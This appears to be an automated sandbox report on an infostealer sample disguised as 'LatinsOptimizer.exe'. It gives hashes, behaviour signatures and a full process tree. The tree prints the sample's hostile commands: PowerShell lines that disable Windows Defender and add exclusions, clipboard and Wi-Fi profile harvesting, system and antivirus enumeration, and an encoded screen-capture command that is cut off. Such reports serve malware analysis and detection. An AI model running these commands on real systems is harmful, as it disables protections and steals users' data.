Analysis
-
max time kernel
94s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2024 19:24
Behavioral task
behavioral1
Sample
LatinsOptimizer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
LatinsOptimizer.exe
Resource
win10v2004-20241007-en
General
-
Target
LatinsOptimizer.exe
-
Size
8.2MB
-
MD5
b0643736c22660561c51ecaa27998aca
-
SHA1
cb0795313488b34679e4e64ddebff5be5ac6c5e4
-
SHA256
d28f3d7afe5e864574d8af35be454d8ada064af16f1b9f03a89f4139aeee84a1
-
SHA512
6f72520ea88fe3708434b5085a34d561a41d8ddfee779d3c15827b9ac1ed034d6fedf53e24a752a8bf5caed71053ca11857ca54c9a1f95276cb588a4c736b858
-
SSDEEP
196608:Rg8PlQvELjv+bhqNVoB0SEsucQZ41JBbIEs1Lv:28PlQ8L+9qz80SJHQK1J9shv
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3292 powershell.exe 4060 powershell.exe 4232 powershell.exe 220 powershell.exe 3620 powershell.exe -
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bound.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts LatinsOptimizer.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1384 cmd.exe 1072 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 3952 bound.exe 4472 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe 1256 LatinsOptimizer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 26 raw.githubusercontent.com 27 raw.githubusercontent.com 36 discord.com 37 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com 34 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 3820 tasklist.exe 5016 tasklist.exe 2028 tasklist.exe 1400 tasklist.exe 2372 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4428 cmd.exe -
resource yara_rule behavioral2/files/0x000a000000023b97-22.dat upx behavioral2/memory/1256-26-0x00007FFE10E10000-0x00007FFE113FE000-memory.dmp upx behavioral2/files/0x000a000000023b89-28.dat upx behavioral2/files/0x000a000000023b95-30.dat upx behavioral2/files/0x000a000000023b90-50.dat upx behavioral2/files/0x000a000000023b8f-49.dat upx behavioral2/files/0x000a000000023b8e-48.dat upx behavioral2/files/0x000a000000023b8d-47.dat upx behavioral2/files/0x000a000000023b8c-46.dat upx behavioral2/files/0x000a000000023b8b-45.dat upx behavioral2/files/0x000a000000023b8a-44.dat upx behavioral2/files/0x000a000000023b88-43.dat upx behavioral2/files/0x000a000000023b9c-42.dat upx behavioral2/files/0x000a000000023b9b-41.dat upx behavioral2/files/0x000a000000023b9a-40.dat upx behavioral2/files/0x000a000000023b96-37.dat upx behavioral2/memory/1256-36-0x00007FFE28FE0000-0x00007FFE28FEF000-memory.dmp upx behavioral2/files/0x000a000000023b94-35.dat upx behavioral2/memory/1256-31-0x00007FFE24010000-0x00007FFE24034000-memory.dmp upx behavioral2/memory/1256-56-0x00007FFE20850000-0x00007FFE2087D000-memory.dmp upx behavioral2/memory/1256-58-0x00007FFE204C0000-0x00007FFE204D9000-memory.dmp upx behavioral2/memory/1256-60-0x00007FFE20490000-0x00007FFE204B3000-memory.dmp upx behavioral2/memory/1256-62-0x00007FFE105B0000-0x00007FFE10726000-memory.dmp upx behavioral2/memory/1256-64-0x00007FFE1FC20000-0x00007FFE1FC39000-memory.dmp upx behavioral2/memory/1256-66-0x00007FFE20680000-0x00007FFE2068D000-memory.dmp upx behavioral2/memory/1256-68-0x00007FFE204F0000-0x00007FFE20523000-memory.dmp upx behavioral2/memory/1256-73-0x00007FFE10D40000-0x00007FFE10E0D000-memory.dmp upx behavioral2/memory/1256-76-0x00007FFE24010000-0x00007FFE24034000-memory.dmp upx behavioral2/memory/1256-75-0x00007FFE0FFB0000-0x00007FFE104D2000-memory.dmp upx behavioral2/memory/1256-72-0x00007FFE10E10000-0x00007FFE113FE000-memory.dmp upx behavioral2/memory/1256-80-0x00007FFE204E0000-0x00007FFE204ED000-memory.dmp upx behavioral2/memory/1256-78-0x00007FFE27E10000-0x00007FFE27E24000-memory.dmp upx behavioral2/memory/1256-83-0x00007FFE204C0000-0x00007FFE204D9000-memory.dmp upx behavioral2/memory/1256-84-0x00007FFE10C20000-0x00007FFE10D3C000-memory.dmp upx behavioral2/memory/1256-140-0x00007FFE20490000-0x00007FFE204B3000-memory.dmp upx behavioral2/memory/1256-149-0x00007FFE105B0000-0x00007FFE10726000-memory.dmp upx behavioral2/memory/1256-203-0x00007FFE1FC20000-0x00007FFE1FC39000-memory.dmp upx behavioral2/memory/1256-285-0x00007FFE204F0000-0x00007FFE20523000-memory.dmp upx behavioral2/memory/1256-320-0x00007FFE10D40000-0x00007FFE10E0D000-memory.dmp upx behavioral2/memory/1256-332-0x00007FFE0FFB0000-0x00007FFE104D2000-memory.dmp upx behavioral2/memory/1256-359-0x00007FFE105B0000-0x00007FFE10726000-memory.dmp upx behavioral2/memory/1256-354-0x00007FFE24010000-0x00007FFE24034000-memory.dmp upx behavioral2/memory/1256-353-0x00007FFE10E10000-0x00007FFE113FE000-memory.dmp upx behavioral2/memory/1256-383-0x00007FFE10C20000-0x00007FFE10D3C000-memory.dmp upx behavioral2/memory/1256-394-0x00007FFE10D40000-0x00007FFE10E0D000-memory.dmp upx behavioral2/memory/1256-393-0x00007FFE204F0000-0x00007FFE20523000-memory.dmp upx behavioral2/memory/1256-392-0x00007FFE20680000-0x00007FFE2068D000-memory.dmp upx behavioral2/memory/1256-391-0x00007FFE1FC20000-0x00007FFE1FC39000-memory.dmp upx behavioral2/memory/1256-390-0x00007FFE105B0000-0x00007FFE10726000-memory.dmp upx behavioral2/memory/1256-389-0x00007FFE20490000-0x00007FFE204B3000-memory.dmp upx behavioral2/memory/1256-388-0x00007FFE204C0000-0x00007FFE204D9000-memory.dmp upx behavioral2/memory/1256-387-0x00007FFE20850000-0x00007FFE2087D000-memory.dmp upx behavioral2/memory/1256-386-0x00007FFE28FE0000-0x00007FFE28FEF000-memory.dmp upx behavioral2/memory/1256-385-0x00007FFE24010000-0x00007FFE24034000-memory.dmp upx behavioral2/memory/1256-384-0x00007FFE0FFB0000-0x00007FFE104D2000-memory.dmp upx behavioral2/memory/1256-369-0x00007FFE10E10000-0x00007FFE113FE000-memory.dmp upx behavioral2/memory/1256-382-0x00007FFE204E0000-0x00007FFE204ED000-memory.dmp upx behavioral2/memory/1256-381-0x00007FFE27E10000-0x00007FFE27E24000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4064 cmd.exe 2488 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3044 cmd.exe 3532 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4620 WMIC.exe 3092 WMIC.exe 1200 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2936 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2488 PING.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 4232 powershell.exe 4232 powershell.exe 4060 powershell.exe 3292 powershell.exe 3292 powershell.exe 3292 powershell.exe 4060 powershell.exe 4060 powershell.exe 1072 powershell.exe 1072 powershell.exe 1072 powershell.exe 3180 powershell.exe 3180 powershell.exe 3180 powershell.exe 220 powershell.exe 220 powershell.exe 1384 powershell.exe 1384 powershell.exe 3952 bound.exe 3620 powershell.exe 3620 powershell.exe 4288 powershell.exe 4288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4232 powershell.exe Token: SeDebugPrivilege 3820 tasklist.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 3292 powershell.exe Token: SeIncreaseQuotaPrivilege 1048 WMIC.exe Token: SeSecurityPrivilege 1048 WMIC.exe Token: SeTakeOwnershipPrivilege 1048 WMIC.exe Token: SeLoadDriverPrivilege 1048 WMIC.exe Token: SeSystemProfilePrivilege 1048 WMIC.exe Token: SeSystemtimePrivilege 1048 WMIC.exe Token: SeProfSingleProcessPrivilege 1048 WMIC.exe Token: SeIncBasePriorityPrivilege 1048 WMIC.exe Token: SeCreatePagefilePrivilege 1048 WMIC.exe Token: SeBackupPrivilege 1048 WMIC.exe Token: SeRestorePrivilege 1048 WMIC.exe Token: SeShutdownPrivilege 1048 WMIC.exe Token: SeDebugPrivilege 1048 WMIC.exe Token: SeSystemEnvironmentPrivilege 1048 WMIC.exe Token: SeRemoteShutdownPrivilege 1048 WMIC.exe Token: SeUndockPrivilege 1048 WMIC.exe Token: SeManageVolumePrivilege 1048 WMIC.exe Token: 33 1048 WMIC.exe Token: 34 1048 WMIC.exe Token: 35 1048 WMIC.exe Token: 36 1048 WMIC.exe Token: SeIncreaseQuotaPrivilege 1048 WMIC.exe Token: SeSecurityPrivilege 1048 WMIC.exe Token: SeTakeOwnershipPrivilege 1048 WMIC.exe Token: SeLoadDriverPrivilege 1048 WMIC.exe Token: SeSystemProfilePrivilege 1048 WMIC.exe Token: SeSystemtimePrivilege 1048 WMIC.exe Token: SeProfSingleProcessPrivilege 1048 WMIC.exe Token: SeIncBasePriorityPrivilege 1048 WMIC.exe Token: SeCreatePagefilePrivilege 1048 WMIC.exe Token: SeBackupPrivilege 1048 WMIC.exe Token: SeRestorePrivilege 1048 WMIC.exe Token: SeShutdownPrivilege 1048 WMIC.exe Token: SeDebugPrivilege 1048 WMIC.exe Token: SeSystemEnvironmentPrivilege 1048 WMIC.exe Token: SeRemoteShutdownPrivilege 1048 WMIC.exe Token: SeUndockPrivilege 1048 WMIC.exe Token: SeManageVolumePrivilege 1048 WMIC.exe Token: 33 1048 WMIC.exe Token: 34 1048 WMIC.exe Token: 35 1048 WMIC.exe Token: 36 1048 WMIC.exe Token: SeIncreaseQuotaPrivilege 4620 WMIC.exe Token: SeSecurityPrivilege 4620 WMIC.exe Token: SeTakeOwnershipPrivilege 4620 WMIC.exe Token: SeLoadDriverPrivilege 4620 WMIC.exe Token: SeSystemProfilePrivilege 4620 WMIC.exe Token: SeSystemtimePrivilege 4620 WMIC.exe Token: SeProfSingleProcessPrivilege 4620 WMIC.exe Token: SeIncBasePriorityPrivilege 4620 WMIC.exe Token: SeCreatePagefilePrivilege 4620 WMIC.exe Token: SeBackupPrivilege 4620 WMIC.exe Token: SeRestorePrivilege 4620 WMIC.exe Token: SeShutdownPrivilege 4620 WMIC.exe Token: SeDebugPrivilege 4620 WMIC.exe Token: SeSystemEnvironmentPrivilege 4620 WMIC.exe Token: SeRemoteShutdownPrivilege 4620 WMIC.exe Token: SeUndockPrivilege 4620 WMIC.exe Token: SeManageVolumePrivilege 4620 WMIC.exe Token: 33 4620 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3952 bound.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4924 wrote to memory of 1256 4924 LatinsOptimizer.exe 83 PID 4924 wrote to memory of 1256 4924 LatinsOptimizer.exe 83 PID 1256 wrote to memory of 3504 1256 LatinsOptimizer.exe 84 PID 1256 wrote to memory of 3504 1256 LatinsOptimizer.exe 84 PID 1256 wrote to memory of 3184 1256 LatinsOptimizer.exe 85 PID 1256 wrote to memory of 3184 1256 LatinsOptimizer.exe 85 PID 1256 wrote to memory of 2848 1256 LatinsOptimizer.exe 88 PID 1256 wrote to memory of 2848 1256 LatinsOptimizer.exe 88 PID 1256 wrote to memory of 1580 1256 LatinsOptimizer.exe 89 PID 1256 wrote to memory of 1580 1256 LatinsOptimizer.exe 89 PID 1256 wrote to memory of 3144 1256 LatinsOptimizer.exe 90 PID 1256 wrote to memory of 3144 1256 LatinsOptimizer.exe 90 PID 3184 wrote to memory of 4232 3184 cmd.exe 94 PID 3184 wrote to memory of 4232 3184 cmd.exe 94 PID 3144 wrote to memory of 3820 3144 cmd.exe 95 PID 3144 wrote to memory of 3820 3144 cmd.exe 95 PID 3504 wrote to memory of 3292 3504 cmd.exe 96 PID 3504 wrote to memory of 3292 3504 cmd.exe 96 PID 2848 wrote to memory of 4060 2848 cmd.exe 97 PID 2848 wrote to memory of 4060 2848 cmd.exe 97 PID 1580 wrote to memory of 3952 1580 cmd.exe 98 PID 1580 wrote to memory of 3952 1580 cmd.exe 98 PID 1256 wrote to memory of 544 1256 LatinsOptimizer.exe 100 PID 1256 wrote to memory of 544 1256 LatinsOptimizer.exe 100 PID 544 wrote to memory of 1048 544 cmd.exe 102 PID 544 wrote to memory of 1048 544 cmd.exe 102 PID 1256 wrote to memory of 1360 1256 LatinsOptimizer.exe 103 PID 1256 wrote to memory of 1360 1256 LatinsOptimizer.exe 103 PID 1360 wrote to memory of 1092 1360 cmd.exe 105 PID 1360 wrote to memory of 1092 1360 cmd.exe 105 PID 1256 wrote to memory of 3340 1256 LatinsOptimizer.exe 152 PID 1256 wrote to memory of 3340 1256 LatinsOptimizer.exe 152 PID 3340 wrote to memory of 4960 3340 cmd.exe 108 PID 3340 wrote to memory of 4960 3340 cmd.exe 108 PID 1256 wrote to memory of 2440 1256 LatinsOptimizer.exe 109 PID 1256 wrote to memory of 2440 1256 LatinsOptimizer.exe 109 PID 2440 wrote to memory of 4620 2440 cmd.exe 111 PID 2440 wrote to memory of 4620 2440 cmd.exe 111 PID 1256 wrote to memory of 4516 1256 LatinsOptimizer.exe 112 PID 1256 wrote to memory of 4516 1256 LatinsOptimizer.exe 112 PID 4516 wrote to memory of 3092 4516 cmd.exe 114 PID 4516 wrote to memory of 3092 4516 cmd.exe 114 PID 1256 wrote to memory of 4428 1256 LatinsOptimizer.exe 115 PID 1256 wrote to memory of 4428 1256 LatinsOptimizer.exe 115 PID 4428 wrote to memory of 4964 4428 cmd.exe 117 PID 4428 wrote to memory of 4964 4428 cmd.exe 117 PID 1256 wrote to memory of 4644 1256 LatinsOptimizer.exe 118 PID 1256 wrote to memory of 4644 1256 LatinsOptimizer.exe 118 PID 1256 wrote to memory of 5004 1256 LatinsOptimizer.exe 120 PID 1256 wrote to memory of 5004 1256 LatinsOptimizer.exe 120 PID 5004 wrote to memory of 2028 5004 cmd.exe 122 PID 5004 wrote to memory of 2028 5004 cmd.exe 122 PID 4644 wrote to memory of 5016 4644 cmd.exe 123 PID 4644 wrote to memory of 5016 4644 cmd.exe 123 PID 1256 wrote to memory of 2324 1256 LatinsOptimizer.exe 124 PID 1256 wrote to memory of 2324 1256 LatinsOptimizer.exe 124 PID 1256 wrote to memory of 1384 1256 LatinsOptimizer.exe 181 PID 1256 wrote to memory of 1384 1256 LatinsOptimizer.exe 181 PID 1256 wrote to memory of 1584 1256 LatinsOptimizer.exe 128 PID 1256 wrote to memory of 1584 1256 LatinsOptimizer.exe 128 PID 1256 wrote to memory of 4472 1256 LatinsOptimizer.exe 189 PID 1256 wrote to memory of 4472 1256 LatinsOptimizer.exe 189 PID 1256 wrote to memory of 3044 1256 LatinsOptimizer.exe 132 PID 1256 wrote to memory of 3044 1256 LatinsOptimizer.exe 132 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4296 attrib.exe 4964 attrib.exe 448 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe"C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe"C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\LatinsOptimizer.exe"4⤵
- Views/modifies file attributes
PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2324
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1584
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4472
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3044 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3632
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1068
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgA